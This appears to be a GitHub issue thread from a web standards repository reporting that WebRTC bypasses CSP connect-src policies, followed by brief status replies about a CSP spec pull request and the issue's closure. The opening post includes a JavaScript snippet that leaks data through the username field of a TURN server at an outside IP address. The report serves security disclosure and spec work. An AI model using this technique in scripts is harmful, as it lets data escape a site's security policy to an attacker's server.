WebRTC bypass CSP connect-src policies

Question

WebRTC bypass CSP connect-src policies

murillo128 opened this issue 7 years ago · 4 comments

As explained in here: w3c/webappsec-csp#92 WebRTC bypass the CSP security policies for connect-src and a malicious script could use webrtc to leak data to a rogue server.

Note that it is not even needed to use datachannels at all, as you could leak data (at low rate) to a specially crafted TURN server on the username:

var pc = new RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=udp"],"username":"_all_your_data_belongs_to_us","credential":"."}]});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);

IMHO this should be covered at the CSP spec, but we should add a warning at the security and privacy section of the webrtc spec until this is solved.

Answer 1 · 2018-01-18T15:52:55.000Z

Pull request on CSP spec: w3c/webappsec-csp#287

Answer 2 · 2018-08-22T21:00:30.000Z

What's the status here?

Answer 3 · 2019-07-04T14:11:57.000Z

Since this is a new feature, and we've stopped adding new features, I'm moving this to the NV repo.

Answer 4 · 2019-08-27T20:06:15.000Z

With merger of PR 38, closing this issue.